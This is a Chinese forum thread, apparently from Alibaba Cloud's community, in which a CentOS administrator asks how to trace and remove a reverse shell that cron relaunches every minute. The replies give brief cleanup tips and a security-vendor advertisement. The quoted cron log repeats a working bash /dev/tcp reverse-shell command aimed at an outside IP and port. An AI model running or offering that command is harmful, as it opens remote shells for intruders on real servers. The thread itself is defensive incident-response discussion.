反弹SHELL如何清除
大家好,最近我们的CENTOS服务器中了反弹SHELL。幸好我们有防火墙。反弹SHELL无法兴风作浪。但是我们KILL掉反弹SHELL的进程,他还是会继续起来。而且由于反弹SHELL无法连接远程服务器(因为防火墙挡住了),一直在重启连接。
我们查看了计划任务crontab -l .没有发现任何异常。但是在cron的日志里面,就发现了反弹SHELL的启动日志。如下:
Apr 10 08:23:01 iZgw82jiymwc5j3yi9fjg3Z CROND[2841]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)但是再去仔细看crontab -l.里面也没有找到这个命令。请问如何能够找到这个日志里面的执行脚本或者执行命令的位置,谢谢
Apr 10 08:24:01 iZgw82jiymwc5j3yi9fjg3Z CROND[3716]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
Apr 10 08:25:01 iZgw82jiymwc5j3yi9fjg3Z CROND[9405]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
Apr 10 08:26:01 iZgw82jiymwc5j3yi9fjg3Z CROND[10350]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
Apr 10 08:27:01 iZgw82jiymwc5j3yi9fjg3Z CROND[11148]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
Apr 10 08:28:01 iZgw82jiymwc5j3yi9fjg3Z CROND[11890]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
Apr 10 08:29:01 iZgw82jiymwc5j3yi9fjg3Z CROND[12568]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
写回答
-
Sinesafe专注于网站安全,服务器安全,解决各类网络安全问题,对代码审计以及漏洞修补安全加固有专业的十年实战经验.官方站点www.sinesafe.com服务器被提示反弹shell的话肯定是服务器或应用有漏洞导致被黑客执行了反弹shell的命令,建议向网站漏洞修复公司SINE安全寻求技术支持。
2022-07-28 14:56:04赞同 1 展开评论 打赏 -
10年的互联网从业经验,熟悉Win和Linux运维方面实战技术,常用PHP和Nodejs作为服务端开发载体,学习移动端混合开发框架,如weex vue检查自启动进程 非系统和自己安装的都 kill -9掉
关闭 非安全的 tty连接
删除 非法用户2018-05-12 16:33:51赞同 展开评论 打赏 -
-
旺旺:nectar2。楼主您好,
是否可能在文件系统里搜索某些关键字符(如IP地址),看是否能搜索到包含这些关键字符的文件?2018-04-15 10:41:12赞同 展开评论 打赏
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
